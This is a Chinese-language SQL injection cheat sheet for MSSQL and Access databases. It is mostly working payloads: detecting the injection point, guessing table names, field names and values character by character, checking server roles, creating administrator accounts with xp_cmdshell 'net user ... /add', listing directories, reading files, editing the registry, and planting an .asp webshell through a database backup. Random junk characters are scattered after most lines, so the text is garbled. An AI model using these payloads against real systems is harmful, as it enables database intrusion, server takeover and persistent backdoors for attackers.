1.判断是否有注入;and 1=1 ;and 1=2 )`,3/i9C$
2.初步判断是否是mssql ;and user>0 |B;:Ald
<S6|$7{1
3.注入参数是字符'and [查询条件] and ''=' (YGJw?]
|TkMrj0
4.搜索时没过滤参数的'and [查询条件] and '%25'=' S)n~^q
X@\rg}kP
5.判断数据库系统 x!tCK47Yq
[wjA8d.
;and (select count(*) from sysobjects)>0 mssql rts@1JY[
s0E:hn:
;and (select count(*) from msysobjects)>0 access {&4+W=0
n
R% l=NHB}
p3\F1]( Z
e#0R9+"Ba
6.猜数据库 ;and (select Count(*) from [数据库名])>0 A>b o Xcr
UCa(3p^V_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 3!Gnc0%c
bEMD2ABm
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 mPi4.p)
R}#?A%,*
9.(1)猜字段的ascii值(access) 3(}W=oI
E/Q[J.$o
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z$QYl*F1
TF^Rh4
(2)猜字段的ascii值(mssql) a^@6hC>sr
MkRRBvk
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 u1~H1
]Ii
ss-{l+Z5
10.测试权限结构(mssql) >TeTa l
V[(zRGa{
`$AX!,<!G
H CZ#7Z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Vge9AH:op
jRmv~]
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- MIsjTKE
q#xoM1
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- GASDkVoij
$GSn#} yz
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ^Cst4=:W
VEkv
JX.
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- quTM|>=_R
&
VJ+X|Z
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [W,Ej
i
?%;s5<
;and 1=(select IS_MEMBER('db_owner'));-- d!D#:l3;
yS0!#AG
X"z^4?Aj+
K pDK Ii
11.添加mssql和系统的帐户 MD1n+FgTu
L09YA
;exec master.dbo.sp_addlogin username;-- 5*/~) wN\U
;exec master.dbo.sp_password null,username,password;-- >OgA3)X
F
*=>=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 7.,C'^ci
k-Hy>5;
;exec master.dbo.xp_cmdshell 'net user username password Eh^c4x
-lQ8
&eB
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- t3}>5cAxy
NoB)tAvw
;exec master.dbo.xp_cmdshell 'net user username password /add';-- jL8.*pfv
az*c0Z<pl
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- D{x'k2=
%c<e`P;
^":UkPFCx:
D|9xD
12.(1)遍历目录 )[C]1N=tK
FO<PMK
;create table dirs(paths varchar(100), id int) H9?(5
6ey{+8
;insert dirs exec master.dbo.xp_dirtree 'c:\' b}HLuX
)\s{\u
\
;and (select top 1 paths from dirs)>0 C< 3`]l
g`i?]6c}jt
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;.Zgt8/.
<wfPbzs-V
l+HmG< P
+DmfqKKbd
(2)遍历目录 6!sC
5 Tag-+
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- v*iD)k:|t
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 K|%.mcs4
y-6k<RN
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *'H0%GM
&b'IYoe
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 J~Uq'1?
97l<9^$
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Gf_Je
?41bZ$j
|J-Osi
eS-akx^@
13.mssql中的存储过程 X
[IVK~D}z
.)59*'0
xp_regenumvalues 注册表根键, 子键 $ @g\wz
He vZ}.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 a> qB
k})
[U'I3x,
xp_regread 根键,子键,键值名 c|m*<
i
NXo$rf:
;exec xp_regread 4zKmoYt
K~Nx;{{d
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6l]jmj)/
+ -~8t^
xp_regwrite 根键,子键, 值名, 值类型, 值 1[p6v4qO{
Nk?eVJ)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 sB`.G
e}>3<Dh
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ]Y111<Ja
H c,e&R
xp_regdeletevalue 根键,子键,值名 Gf71udaa
Jx@_OE_vp
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 f$1&)1W[
[wOz<<
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 uaghB,i'n
#djby}hi
m&vuBb3
RwKnNIp
14.mssql的backup创建webshell >vQ8~*xd
.JCd:'-
use model
[GQn1ZLc
FxU a5n
create table cmd(str image); Fi)(~ji:
RK)1@Tz7!
insert into cmd(str) values (''); jKr\mb
P^[eTR*?
backup database model to disk='c:\l.asp'; pLj[b4p9
o-I:p$B -
>|zMN$:
9Xl[AVs:M
15.mssql内置函数 sE^ee2]OI@
B703{k
;and (select @@version)>0 获得Windows的版本号 sU Er?TZ
&_cH9zw@
;and user_name()='dbo' 判断当前系统的连接用户是不是sa HOt,G
_{
UOIB}ut
V
;and (select user_name())>0 爆当前系统的连接用户 56w uk
[)
W {A4*{
;and (select db_name())>0 得到当前连接的数据库 J4?i\wD:
Ls<^z@I
\!LIqqX
/U26IbJ
16.简洁的webshell )iX2r{
U}T{r%9
use model s!<RWy+
z@I'Ryalyc
create table cmd(str image); tNoPpIu
CiWz>HWH
insert into cmd(str) values (''); S^s|/!>
d!{]CZ"@
backup database model to disk='g:\wwwtest\l.asp';